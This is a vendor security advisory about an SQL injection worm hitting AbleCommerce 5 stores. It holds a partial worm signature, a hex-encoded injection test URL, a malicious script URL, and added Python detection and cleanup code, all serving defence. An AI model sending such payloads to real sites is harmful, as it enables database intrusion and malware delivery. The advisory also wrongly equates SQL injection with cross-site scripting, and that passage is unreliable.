Potential SQL Injection in AbleCommerce 5

Version: AbleCommerce 5.x Asp.Net and AbleCommerce 5.x CFMX

Severity: Critical (potentially)

Applies to: All Versions

Release Date:  8/28/2008

 

DETAILS

OVERVIEW and PREVENTION

Recently, a few AbleCommerce stores have been under attack by a new SQL injection worm circulating on the internet.  The worm targets scripted pages that post information to an MS-SQL database.  So any page that has a field where input can be entered is a potential problem source.  

For AbleCommerce stores, the attack has mainly targeted older versions of AbleCommerce 5.2 and 5.5.  If you have been keeping your store updated with all the latest patches and updates, then you should be fine.  However, holes can still exist, either in a customization or a store template that wasn’t part of a core upgrade.  Therefore, AbleCommerce has released a global solution which can easily remedy any potential injection attacks.  The fix is quick and will prevent any harm to your store.  

Pick the applicable fix above, download the fix and open the readme.txt for further instructions.  

IMPORTANT:  ALL AbleCommerce 5.x stores should be patched because of the potential seriousness of this issue.  A successful intrusion attempt can disable your database, bring down your store, and worse, infect your users.

 

What is an SQL injection attack?

SQL injection is also known as cross-site scripting.  The cross-site scripting attack is one of the most common, yet overlooked, security problems facing web developers today. A web site is vulnerable if it displays user-submitted content without checking for malicious script tags.

The target of cross-site scripting attacks is not the server itself, but the user files on the server, such as forms and other dynamic content. All a malicious attacker needs to do is find a page that does not properly sanitize user input, but returns the scripting code verbatim to the browser of a visitor to that website. It is important to note that websites that use SSL are just as vulnerable as websites that do not encrypt browser sessions.

The damage caused by such an attack can range from stealing session and cookie data from your customers to loading a virus payload onto their computer via browser.

The pages listed in the vulnerability output return embedded JavaScript to the user with no filtering.  

 

How do I know if my store has been attacked?

If an attack is successful, there will be links to malicious JavaScript inserted into the text fields of your database.  This, in turn, can be displayed on your website and potentially harm your users' computers.

The SQL injection can scan all the tables in the database, so it might be difficult to know what data has been corrupted.  We have had reports of the STORES table being injected with bad code, which would immediately shut down your store.  Other reports have included the COUNTRIES table and the USERS table.  Unfortunately, there is no one table to look at, so the easiest detection will be to look at your website logs.

You will want to search for something like this:

DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b…

 

What should I do if my database has been corrupted?

  • First, you should apply the AbleCommerce patch right away so any further attacks can be prevented.  We have found that once the worm finds its way into your database, it won't stop.

  • Next, you will need to clean your data of any malicious JavaScript.  It should be obvious where the code has been appended to your existing data.  It might look something like this:

    www0.douhunqn.cn/csrss/w.js


    Depending on your ability to find and update SQL databases, this task will be different for everyone.  You can also restore a backup of the database that is known to be clean.
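The cleanup step, as an added example (not AbleCommerce's own tooling): the script scans every text column of a set of rows for an appended `<script src=...></script>` tag, strips the tag, records which row and column carried which URL so the change can be reviewed, and builds parameterised UPDATE statements for only the affected columns. The rows are constructed here as dicts (as a cursor returning dict rows would, an assumption), the `?` placeholders follow the pyodbc convention (also an assumption), and the script URL in the sample is the one quoted above.

```python
import re

# A <script> tag that loads an external file, as appended by the worm. Any src is
# matched, not just the URL quoted in the advisory, so variants are found too.
INJECTED_SCRIPT = re.compile(
    r"""<script\b[^>]*\bsrc\s*=\s*["']?(?P<src>[^"'\s>]+)["']?[^>]*>\s*</script>""",
    re.IGNORECASE,
)


def find_injected_scripts(value):
    """Return the external script URLs found in one text value (none for non-text)."""
    if not isinstance(value, str):
        return []
    return [m.group("src") for m in INJECTED_SCRIPT.finditer(value)]


def clean_value(value):
    """Strip injected script tags from one value; returns (cleaned, removed_urls)."""
    urls = find_injected_scripts(value)
    if not urls:
        return value, []
    return INJECTED_SCRIPT.sub("", value).rstrip(), urls


def clean_rows(table, rows, key):
    """Scan every column of every row. Returns the cleaned rows and an audit list
    of (table, key value, column, url) describing exactly what was removed."""
    audit, cleaned_rows = [], []
    for row in rows:
        new_row = {}
        for column, value in row.items():
            new_value, urls = clean_value(value)
            new_row[column] = new_value
            for url in urls:
                audit.append((table, row[key], column, url))
        cleaned_rows.append(new_row)
    return cleaned_rows, audit


def update_statements(table, cleaned_rows, audit, key):
    """Build one parameterised UPDATE per flagged (row, column). Table and column
    names come from the DBA, not from user input; the cleaned value and the key
    travel as parameters ('?' placeholders, pyodbc style, an assumption) and are
    never concatenated into the SQL text."""
    by_key = {row[key]: row for row in cleaned_rows}
    seen, statements = set(), []
    for _, key_value, column, _ in audit:
        if (key_value, column) in seen:
            continue
        seen.add((key_value, column))
        statements.append((
            f"UPDATE [{table}] SET [{column}] = ? WHERE [{key}] = ?",
            (by_key[key_value][column], key_value),
        ))
    return statements


# Constructed sample rows (not real store data); the script URL is the one the
# advisory quotes, shown once unquoted and once quoted as both forms occur.
SAMPLE_STORES = [
    {"StoreId": 1,
     "Name": "Demo Store<script src=http://www0.douhunqn.cn/csrss/w.js></script>",
     "Slogan": "Best prices"},
    {"StoreId": 2,
     "Name": "Second Store",
     "Slogan": 'Free shipping<script src="http://www0.douhunqn.cn/csrss/w.js"></script>'},
]

if __name__ == "__main__":
    cleaned, audit = clean_rows("Stores", SAMPLE_STORES, "StoreId")
    for entry in audit:
        print("removed", entry)
    for sql, params in update_statements("Stores", cleaned, audit, "StoreId"):
        print(sql, params)
```

Review the audit list before running the statements; if the injected rows are numerous or the data was altered in other ways, restoring the known-clean backup mentioned above is the safer route.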

 

Testing for Vulnerabilities

If you have custom pages and you want to make sure they are protected with the patch, you can try this quick test:

Build a URL to your website, substituting your own domain, path, and the page in question.

e.g.   http://www.server.url/path/page.aspx

Now, append the URL with the following so it looks something like this:

http://www.server.url/path/page.aspx?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861…%20AS%20CHAR(4000));EXEC(@S);

 

If the file is protected, then you should receive the message "Invalid Request".
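The log search described under "How do I know if my store has been attacked?" and the request check this test exercises both come down to recognising the same statement, so one added example (not AbleCommerce's patch code, whose implementation is not shown here) covers both. It URL-decodes a query string, unwraps the `CAST(0x...)` hex form used in the test URL above back into text, matches the cursor statement quoted earlier, and runs that check over a few constructed log lines in IIS W3C layout (the layout is an assumption). The same `is_injection_attempt` function applied to the incoming query string is the kind of check that would answer with "Invalid Request".

```python
import re
from urllib.parse import unquote_plus

# Stable prefix of the statement quoted in the advisory: two varchar variables
# followed by a cursor over the system catalog. Variable and cursor names are
# wildcarded so renamed variants are still caught.
WORM_SIGNATURE = re.compile(
    r"DECLARE\s+@\w+\s+varchar\(\d+\)\s*,\s*@\w+\s+varchar\(\d+\)\s+DECLARE\s+\w+\s+CURSOR",
    re.IGNORECASE,
)

# Shape of the hex-wrapped form in the advisory's test URL: CAST(0x... AS CHAR(n));EXEC
CAST_THEN_EXEC = re.compile(
    r"CAST\s*\(\s*0x[0-9A-Fa-f]+\s+AS\s+N?(?:VAR)?CHAR\s*\(\s*\d+\s*\)\s*\)\s*;?\s*EXEC",
    re.IGNORECASE,
)

HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]{2,})")


def url_decode(raw):
    """Decode %xx escapes and '+' twice so double-encoded payloads are unwrapped."""
    return unquote_plus(unquote_plus(raw))


def expand_hex(text):
    """Replace every 0x... literal that decodes to ASCII text with that text, so
    SQL hidden inside CAST(0x...) can be matched like plain SQL. Literals that are
    not text (odd length, non-ASCII bytes) are left untouched."""
    def _expand(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            return bytes.fromhex(digits).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
    return HEX_LITERAL.sub(_expand, text)


def is_injection_attempt(query_string):
    """True if the decoded query string carries the worm's cursor statement,
    either in the clear or wrapped in CAST(0x...)...EXEC."""
    decoded = url_decode(query_string)
    if CAST_THEN_EXEC.search(decoded):
        return True
    return WORM_SIGNATURE.search(expand_hex(decoded)) is not None


def scan_log(lines):
    """Return the 0-based indexes of log lines whose request carries the
    signature. Whole lines are checked, so the exact log layout does not matter."""
    return [i for i, line in enumerate(lines) if is_injection_attempt(line)]


# Constructed sample (not real traffic): IIS W3C-style lines, an assumed layout.
# The third line carries the advisory's hex-wrapped form, built here from the
# plain-text statement so both variants are the same SQL; the fourth carries the
# statement URL-encoded in the clear.
SIGNATURE_TEXT = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'"
)
SIGNATURE_HEX = SIGNATURE_TEXT.encode("ascii").hex().upper()

SAMPLE_LOG = [
    "2008-08-28 10:15:01 10.0.0.5 GET /Default.aspx - 80 - 192.0.2.10 Mozilla/4.0 200 0 0",
    "2008-08-28 10:15:07 10.0.0.5 GET /ProductDetails.aspx ProductID=42 80 - 192.0.2.11 Mozilla/4.0 200 0 0",
    "2008-08-28 10:16:30 10.0.0.5 GET /ProductDetails.aspx ProductID=42';DECLARE%20@S%20CHAR(4000);"
    "SET%20@S=CAST(0x" + SIGNATURE_HEX + "%20AS%20CHAR(4000));EXEC(@S); 80 - 198.51.100.7 Mozilla/4.0 500 0 0",
    "2008-08-28 10:17:02 10.0.0.5 GET /Search.aspx q=%27%3BDECLARE+%40T+varchar%28255%29%2C%40C+varchar%28255%29"
    "+DECLARE+Table_Cursor+CURSOR+FOR+select+a.name%2Cb.name+from+sysobjects+a%2Csyscolumns+b 80 - 198.51.100.7 Mozilla/4.0 200 0 0",
]

if __name__ == "__main__":
    for i in scan_log(SAMPLE_LOG):
        print("injection attempt on line", i + 1, ":", SAMPLE_LOG[i][:80])
```

Point `scan_log` at your real log lines (one string per line) to find the requests that carried the statement; the client address and page on each flagged line tell you which custom pages to check and patch first.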

Any pages outside of the AbleCommerce program should be checked.  This is your responsibility.

The general solution is to HTML-encode data before sending it to the browser.  There are many services on the internet that can help.

 

How do I get more information?

Here are a couple of websites that we found to be helpful.  You can also search for 'sql injection' on google.com.

http://www.sqlsecurity.com/

http://www.f-secure.com/weblog/archives/00001427.html

http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines